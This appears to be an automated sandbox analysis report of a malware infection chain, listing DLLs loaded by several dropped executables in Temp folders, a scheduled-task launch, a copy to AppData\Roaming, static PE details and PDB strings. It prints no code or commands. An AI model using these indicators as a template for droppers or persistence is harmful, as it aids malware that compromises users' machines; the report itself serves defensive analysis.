Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: fswwa.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Section loaded: winnsi.dll

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: S2W2ftXM2b.exe

Static file information: File size 2068480 > 1048576

Source: S2W2ftXM2b.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1f0a00

Source: S2W2ftXM2b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: S2W2ftXM2b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: S2W2ftXM2b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: S2W2ftXM2b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: S2W2ftXM2b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: S2W2ftXM2b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: S2W2ftXM2b.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: S2W2ftXM2b.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: 3Mv6i65.exe, 00000015.00000002.2669480863.00007FFB0C141000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdb source: S2W2ftXM2b.exe
Source:	Binary string: Advance.pdb source: d0HNrLB.exe, 00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp, d0HNrLB.exe, 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, d0HNrLB[1].exe.15.dr, WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: 3Mv6i65.exe, 00000014.00000003.2118072122.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: S2W2ftXM2b.exe
Source:	Binary string: System.ni.pdbRSDS source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.20.dr
Source:	Binary string: Advance.pdbhe source: d0HNrLB.exe, 00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp, d0HNrLB.exe, 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, d0HNrLB[1].exe.15.dr
Source:	Binary string: System.pdb) source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 3Mv6i65.exe, 00000014.00000003.2101104531.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2865428188.00007FFB23B23000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 3Mv6i65.exe, 00000014.00000003.2101104531.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2865428188.00007FFB23B23000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: mscorlib.pdbSystem.Windows.Forms.dll< source: WERDA3F.tmp.dmp.36.dr
Source:	Binary string: System.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: Advance.pdbMZ source: WERCCA3.tmp.dmp.29.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: 3Mv6i65.exe, 00000014.00000003.2101423522.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2790258052.00007FFB22785000.00000002.00000001.01000000.00000017.sdmp, VCRUNTIME140_1.dll.20.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: 3Mv6i65.exe, 00000014.00000003.2117189834.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2765893657.00007FFB226A3000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: 3Mv6i65.exe, 00000015.00000002.2850728722.00007FFB23B01000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 3Mv6i65.exe, 00000014.00000003.2102651912.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp
